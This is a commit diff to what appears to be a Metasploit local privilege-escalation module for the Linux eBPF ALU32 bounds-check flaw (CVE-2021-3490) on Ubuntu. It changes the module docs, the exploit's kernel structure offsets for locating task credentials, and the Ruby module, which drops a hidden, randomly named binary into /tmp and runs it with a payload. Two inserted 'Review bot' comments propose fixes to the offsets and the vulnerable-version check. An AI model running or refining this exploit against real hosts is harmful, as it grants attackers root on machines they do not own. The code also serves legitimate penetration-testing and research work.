Fix up mistakes I noticed whilst doing edits on the code as well as some mistakes identified during peer review
parent
d5df47692c
commit
b60ad3ee26
|
@ -36,6 +36,9 @@ Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu
|
|||
### WritableDir
|
||||
A folder we can write files to. Defaults to `/tmp`
|
||||
|
||||
### CmdTimeout
|
||||
The maximum number of seconds to wait for the exploit to run before we end up timing out. Increase this value if the exploit is timing out.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 21.04 (with Linux 5.11.0-16-generic)
|
||||
|
@ -167,7 +170,7 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
|
|||
```
|
||||
|
||||
|
||||
### Ubuntu 20.04 (with Linux 4.4.0-21-generic)
|
||||
### Ubuntu 20.10 (with Linux 5.8.0-25-generic)
|
||||
|
||||
```
|
||||
msf6 > use multi/handler
|
||||
|
|
|
@ -27,7 +27,7 @@
|
|||
// Offset of tasks field in pid structure
|
||||
#define PID_TASKS_OFFSET 0x10
|
||||
|
||||
// Offset of linked list entry in task_struct
|
||||
// Offset of the pid_links array in task_struct
|
||||
#ifdef GROOVY
|
||||
#define TASK_LIST_OFFSET 0x950
|
||||
#endif
|
||||
|
@ -38,7 +38,7 @@
|
|||
#ifdef GROOVY
|
||||
#define TASK_CRED_OFFSET 0xA88
|
||||
#endif
|
||||
#ifdef HIRSUTE
|
||||
#ifdef HIRSUTE
|
||||
#define TASK_CRED_OFFSET 0x6C8
|
||||
#endif
|
||||
|
||||
|
@ -99,7 +99,7 @@
|
|||
* entry. If any other entry in the array is non-NULL, @xa_head points
|
||||
* to an @xa_node.
|
||||
*/
|
||||
struct xarray
|
||||
struct xarray
|
||||
{
|
||||
int32_t xa_lock;
|
||||
int32_t xa_flags;
|
||||
|
@ -129,7 +129,7 @@ static inline void *xa_mk_internal(unsigned long v)
|
|||
#define radix_tree_node xa_node
|
||||
|
||||
|
||||
struct xa_node
|
||||
struct xa_node
|
||||
{
|
||||
unsigned char shift; /* Bits remaining in each slot */
|
||||
unsigned char offset; /* Slot offset in parent */
|
||||
|
@ -139,9 +139,9 @@ struct xa_node
|
|||
struct xarray *array; /* The array we belong to */
|
||||
char filler[0x10];
|
||||
void *slots[XA_CHUNK_SIZE];
|
||||
};
|
||||
};
|
||||
|
||||
struct idr
|
||||
struct idr
|
||||
{
|
||||
struct radix_tree_root idr_rt;
|
||||
unsigned int idr_base;
|
||||
|
@ -151,7 +151,9 @@ struct idr
|
|||
struct pid_namespace
|
||||
{
|
||||
#ifdef GROOVY
|
||||
uint64_t padding;
|
||||
uint64_t kref; /* From Linux kernel 5.11 this field was removed, however it is present in all previous versions.
|
||||
See https://elixir.bootlin.com/linux/v5.11-rc1/source/include/linux/pid_namespace.h and
|
||||
https://elixir.bootlin.com/linux/v5.10.60/source/include/linux/pid_namespace.h for a comparison */
|
||||
#endif
|
||||
struct idr idr;
|
||||
};
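Review bot: The GROOVY mirror of `struct pid_namespace` puts `struct idr idr` 16 bytes in (`uint64_t padding` followed by `uint64_t kref`), yet in the 5.10 header the new comment links to, `kref` is a 4-byte `struct kref` and `idr` begins at offset 8; if this struct is meant to overlay the kernel object directly, the extra 8 bytes shift every `idr` read, so the `padding` member deserves a comment stating what it accounts for (e.g. `/* padding: the pointer we walk from points 8 bytes before the namespace */`), or the two fields should be collapsed to a single `uint32_t kref` plus alignment if that is not the case. More generally, `PID_TASKS_OFFSET`, `TASK_LIST_OFFSET` and `TASK_CRED_OFFSET` are per-build constants selected only by `GROOVY`/`HIRSUTE`, and a wrong value means the exploit dereferences or patches the wrong kernel address and most likely panics the target; recording the exact kernel package version each value was taken from beside its `#define` (e.g. `/* 5.8.0-25.26, verified against pahole */`) would make the ABI range the documentation claims auditable. The struct definitions continue outside the visible hunks.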
|
||||
|
|
|
@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
)
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 90])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -79,6 +80,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def check
|
||||
if unprivileged_bpf_disabled?
|
||||
return CheckCode::Safe('Unprivileged BPF loading is not permitted')
|
||||
end
|
||||
|
||||
vprint_good('Unprivileged BPF loading is permitted')
|
||||
|
||||
release = kernel_release
|
||||
version = kernel_version
|
||||
|
||||
|
@ -87,7 +94,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
version_array = release.split('-')
|
||||
major_version = version_array[0]
|
||||
minor_version = version_array[1]
|
||||
if Rex::Version.new(major_version) >= Rex::Version.new('5.12.0') # Aka we are past the 5.11.x kernel releases and into at the time of writing beta kernels, then its likely not vuln.
|
||||
if Rex::Version.new(major_version) >= Rex::Version.new('5.12.0') # Aka if we are past the 5.11.x kernel releases and into at the time of
|
||||
# writing beta versions of Ubuntu, then the target isn't vuln.
|
||||
return CheckCode::Safe("Target Ubuntu kernel version is #{major_version}-#{minor_version} which is not vulnerable!")
|
||||
elsif (Rex::Version.new(major_version) == Rex::Version.new('5.11.0')) && (Rex::Version.new(minor_version) >= Rex::Version.new('17.18'))
|
||||
return CheckCode::Safe('Target Ubuntu kernel version is running a 5.11.x build however it has updated to a patched version!')
|
||||
|
@ -102,12 +110,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
vprint_good("Kernel version #{release} appears to be vulnerable")
|
||||
|
||||
if unprivileged_bpf_disabled?
|
||||
return CheckCode::Safe('Unprivileged BPF loading is not permitted')
|
||||
end
|
||||
|
||||
vprint_good('Unprivileged BPF loading is permitted')
|
||||
|
||||
config = kernel_config
|
||||
|
||||
if config.nil?
|
||||
|
@ -132,10 +134,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
|
||||
end
|
||||
|
||||
# if live_compile?
|
||||
# vprint_status('Live compiling exploit on system...')
|
||||
# upload_and_compile(executable_path, exploit_data('cve-2017-16995', 'exploit.c'))
|
||||
# else
|
||||
executable_name = ".#{rand_text_alphanumeric(5..10)}"
|
||||
executable_path = "#{base_dir}/#{executable_name}"
|
||||
vprint_status('Dropping pre-compiled exploit on system...')
|
||||
|
@ -155,6 +153,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Launch exploit
|
||||
print_status('Launching exploit ...')
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, 150)
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
end
|
||||
end
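Review bot: The patched-build test in the `elsif` on the 5.11.x branch compares the second `-` component of `release` against `'17.18'`, but if `kernel_release` is `uname -r` output such as `5.11.0-17-generic`, `release.split('-')` yields only the ABI number `17` for `minor_version`, which `Rex::Version` orders below `17.18`, so a host already on the fixed 5.11.0-17.18 build falls through and is reported vulnerable. Comparing against the ABI alone, `Rex::Version.new(minor_version) >= Rex::Version.new('17')`, matches what the split actually produces; any 5.8.x cut-off handled further down should be checked the same way. The `>= 5.12.0` ceiling is a snapshot of what was unreleased at writing time and would benefit from a `# TODO: revisit once later Ubuntu kernels ship` so it is not mistaken for a patch boundary. The `check` method starts in the preceding hunk and ends outside this one.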
|
||||
|
|